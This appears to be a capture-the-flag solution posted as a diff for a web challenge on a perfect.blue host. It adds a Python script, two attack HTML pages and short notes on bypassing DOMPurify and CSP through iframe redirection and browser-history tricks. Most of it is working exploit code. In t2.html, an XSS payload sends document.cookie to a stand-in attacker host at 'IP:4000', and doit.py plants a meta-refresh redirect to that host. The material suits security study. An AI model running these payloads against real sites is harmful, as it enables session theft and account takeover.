parrot409 · October 14, 2024 13:23 · Oct 14, 2024
diff --git a/doit.py b/doit.py
@@ -0,0 +1,45 @@
+#!/usr/bin/env python3
+import requests
+
+target = 'http://bluesocial.chal.perfect.blue:25005'
+s = requests.session()
+s.post(f'{target}/login',data={'username':'home'})
+s.post(f'{target}/user/update',data={'bio':"""
+    <!DOCTYPE html>
+    <html lang='en'>
+    <head>
+        <meta charset='UTF-8'>
+        <meta name='viewport' content='width=device-width, initial-scale=1.0'>
+        <title>Transient Social App</title>
+    </head>
+    <body style='font-family: Arial, sans-serif; margin: 0; padding: 20px;'>
+        
+    <nav style='background-color: #f2f2f2; padding: 10px; margin-bottom: 20px;'>
+        <h1 style='margin: 0;'><a href='/' style='text-decoration: none; color: black;'>Transient Social App</a></h1>
+        <div>
+            <a href='/user/home'>Home</a> |
+            <a href='/logout'>Logout</a>
+        </div>
+    </nav>
+    
+        
+        <h2>Welcome to Transient Social App, p13372!</h2>
+        <p><strong>Your bio:</strong> <span id='userBio'>Loading...</span></p>
+        <h3>Update Your Bio</h3>
+        <form id='updateBioForm'>
+            <textarea id='bioInput' name='bio' placeholder='Enter your bio'></textarea><br>
+            <button type='submit'>Update Bio</button>
+        </form>
+        <iframe id='dompurifyFrame' src='/user/p13371' style='display: none;'></iframe>
+        <script src='/static/home.js'></script>
+    </body>
+    </html>
+""".replace('\n','')})
+s.post(f'{target}/login',data={'username':'p13371'})
+s.post(f'{target}/user/update',data={'bio':"""
+	<meta http-equiv='refresh' content='0; url=http://IP:4000/t2.html'>
+""".strip()})
+
+s.post(f'{target}/login',data={'username':'home'})
+input('good: ')
+s.get(f'{target}/logout')
diff --git a/info.txt b/info.txt
@@ -0,0 +1,10 @@
+It was a very fun challenge.
+The trick:
+- create user "home"
+- `x = window.open(perfect.blue/user/home)` on attacker.com
+- perfect.blue/user/home has an iframe that can only point to perfect.blue because of csp
+- that iframe redirects ( with meta tag ) to attacker.com/bypass-purify
+- redirect that webpage with `x.location = attacker.com/doesnt-matter`
+- delete user home
+- do `x.history.back()`
+- now magically the /dompurify iframe points to attacker.com/bypass-purify and we can bypass sanitization
diff --git a/t1.html b/t1.html
@@ -0,0 +1,23 @@
+<form id=wow action="http://bluesocial.chal.perfect.blue:25005/login" method=POST >
+<input name=username value=smh >
+</form>
+<script>
+if(window.name){
+wow.submit()
+throw "A"
+} else {
+window.open("?",'d')
+}
+let target = 'http://bluesocial.chal.perfect.blue:25005'
+
+let x = window.open(`${target}/user/home`)
+setTimeout(_=>{
+   x.location = '/xx'
+},2000)
+setTimeout(_=>fetch('?gogo'),3000)
+
+function df(){
+   window.open(`${target}/user/home`)
+   setTimeout(_=>x.history.back(),1000)
+}
+setTimeout(df,6000)
diff --git a/t2.html b/t2.html
@@ -0,0 +1,6 @@
+<script>
+window.addEventListener('message', function(event) {
+    event.ports[0].postMessage(`<img src=1 onerror='fetch("http://IP:4000/?a="+document.cookie)' >`);
+
+});
+</script>
No results found